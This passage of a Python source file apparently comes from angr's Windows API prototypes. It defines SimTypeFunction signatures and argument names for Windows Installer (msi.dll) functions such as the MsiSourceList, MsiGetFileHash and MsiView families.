'MsiLocateComponentA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiLocateComponentW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szComponent", "lpPathBuf", "pcchBuf"]),
#
'MsiSourceListClearAllA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListClearAllW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListAddSourceA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved", "szSource"]),
#
'MsiSourceListAddSourceW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved", "szSource"]),
#
'MsiSourceListForceResolutionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListForceResolutionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szUserName", "dwReserved"]),
#
'MsiSourceListAddSourceExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource", "dwIndex"]),
#
'MsiSourceListAddSourceExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource", "dwIndex"]),
#
'MsiSourceListAddMediaDiskA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId", "szVolumeLabel", "szDiskPrompt"]),
#
'MsiSourceListAddMediaDiskW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId", "szVolumeLabel", "szDiskPrompt"]),
#
'MsiSourceListClearSourceA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource"]),
#
'MsiSourceListClearSourceW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szSource"]),
#
'MsiSourceListClearMediaDiskA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId"]),
#
'MsiSourceListClearMediaDiskW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwDiskId"]),
#
'MsiSourceListClearAllExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListClearAllExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListForceResolutionExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListForceResolutionExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions"]),
#
'MsiSourceListSetInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue"]),
#
'MsiSourceListSetInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue"]),
#
'MsiSourceListGetInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue", "pcchValue"]),
#
'MsiSourceListGetInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "szProperty", "szValue", "pcchValue"]),
#
'MsiSourceListEnumSourcesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "szSource", "pcchSource"]),
#
'MsiSourceListEnumSourcesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "szSource", "pcchSource"]),
#
'MsiSourceListEnumMediaDisksA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "pdwDiskId", "szVolumeLabel", "pcchVolumeLabel", "szDiskPrompt", "pcchDiskPrompt"]),
#
'MsiSourceListEnumMediaDisksW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCodeOrPatchCode", "szUserSid", "dwContext", "dwOptions", "dwIndex", "pdwDiskId", "szVolumeLabel", "pcchVolumeLabel", "szDiskPrompt", "pcchDiskPrompt"]),
#
'MsiGetFileVersionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "lpVersionBuf", "pcchVersionBuf", "lpLangBuf", "pcchLangBuf"]),
#
'MsiGetFileVersionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "lpVersionBuf", "pcchVersionBuf", "lpLangBuf", "pcchLangBuf"]),
#
'MsiGetFileHashA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwFileHashInfoSize": SimTypeInt(signed=False, label="UInt32"), "dwData": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="MSIFILEHASHINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "dwOptions", "pHash"]),
#
'MsiGetFileHashW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwFileHashInfoSize": SimTypeInt(signed=False, label="UInt32"), "dwData": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="MSIFILEHASHINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szFilePath", "dwOptions", "pHash"]),
#
'MsiGetFileSignatureInformationA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({"dwCertEncodingType": SimTypeInt(signed=False, label="UInt32"), "pbCertEncoded": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbCertEncoded": SimTypeInt(signed=False, label="UInt32"), "pCertInfo": SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "SerialNumber": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SignatureAlgorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "Issuer": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "NotBefore": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "NotAfter": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "Subject": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SubjectPublicKeyInfo": SimStruct({"Algorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "PublicKey": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None)}, name="CERT_PUBLIC_KEY_INFO", pack=False, align=None), "IssuerUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "SubjectUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "cExtension": SimTypeInt(signed=False, label="UInt32"), "rgExtension": SimTypePointer(SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "fCritical": SimTypeInt(signed=True, label="Int32"), "Value": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CERT_EXTENSION", pack=False, align=None), offset=0)}, name="CERT_INFO", pack=False, align=None), offset=0), "hCertStore": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CERT_CONTEXT", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["szSignedObjectPath", "dwFlags", "ppcCertContext", "pbHashData", "pcbHashData"]),
#
'MsiGetFileSignatureInformationW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({"dwCertEncodingType": SimTypeInt(signed=False, label="UInt32"), "pbCertEncoded": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbCertEncoded": SimTypeInt(signed=False, label="UInt32"), "pCertInfo": SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "SerialNumber": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SignatureAlgorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "Issuer": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "NotBefore": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "NotAfter": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "Subject": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None), "SubjectPublicKeyInfo": SimStruct({"Algorithm": SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "Parameters": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CRYPT_ALGORITHM_IDENTIFIER", pack=False, align=None), "PublicKey": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None)}, name="CERT_PUBLIC_KEY_INFO", pack=False, align=None), "IssuerUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "SubjectUniqueId": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cUnusedBits": SimTypeInt(signed=False, label="UInt32")}, name="CRYPT_BIT_BLOB", pack=False, align=None), "cExtension": SimTypeInt(signed=False, label="UInt32"), "rgExtension": SimTypePointer(SimStruct({"pszObjId": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "fCritical": SimTypeInt(signed=True, label="Int32"), "Value": SimStruct({"cbData": SimTypeInt(signed=False, label="UInt32"), "pbData": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CRYPTOAPI_BLOB", pack=False, align=None)}, name="CERT_EXTENSION", pack=False, align=None), offset=0)}, name="CERT_INFO", pack=False, align=None), offset=0), "hCertStore": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CERT_CONTEXT", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["szSignedObjectPath", "dwFlags", "ppcCertContext", "pbHashData", "pcbHashData"]),
#
'MsiGetShortcutTargetA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szShortcutPath", "szProductCode", "szFeatureId", "szComponentCode"]),
#
'MsiGetShortcutTargetW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szShortcutPath", "szProductCode", "szFeatureId", "szComponentCode"]),
#
'MsiIsProductElevatedA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "pfElevated"]),
#
'MsiIsProductElevatedW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "pfElevated"]),
#
'MsiNotifySidChangeA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["pOldSid", "pNewSid"]),
#
'MsiNotifySidChangeW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["pOldSid", "pNewSid"]),
#
'MsiBeginTransactionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szName", "dwTransactionAttributes", "phTransactionHandle", "phChangeOfOwnerEvent"]),
#
'MsiBeginTransactionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szName", "dwTransactionAttributes", "phTransactionHandle", "phChangeOfOwnerEvent"]),
#
'MsiEndTransaction': SimTypeFunction([SimTypeInt(signed=False, label="MSITRANSACTIONSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwTransactionState"]),
#
'MsiJoinTransaction': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hTransactionHandle", "dwTransactionAttributes", "phChangeOfOwnerEvent"]),
#
'MsiDatabaseOpenViewA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szQuery", "phView"]),
#
'MsiDatabaseOpenViewW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szQuery", "phView"]),
#
'MsiViewGetErrorA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="MSIDBERROR"), arg_names=["hView", "szColumnNameBuffer", "pcchBuf"]),
#
'MsiViewGetErrorW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="MSIDBERROR"), arg_names=["hView", "szColumnNameBuffer", "pcchBuf"]),
#
'MsiViewExecute': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "hRecord"]),
#
'MsiViewFetch': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "phRecord"]),
#
'MsiViewModify': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSIMODIFY"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "eModifyMode", "hRecord"]),
#
'MsiViewGetColumnInfo': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSICOLINFO"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView", "eColumnInfo", "phRecord"]),
#
'MsiViewClose': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hView"]),
#
'MsiDatabaseGetPrimaryKeysA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "phRecord"]),
#
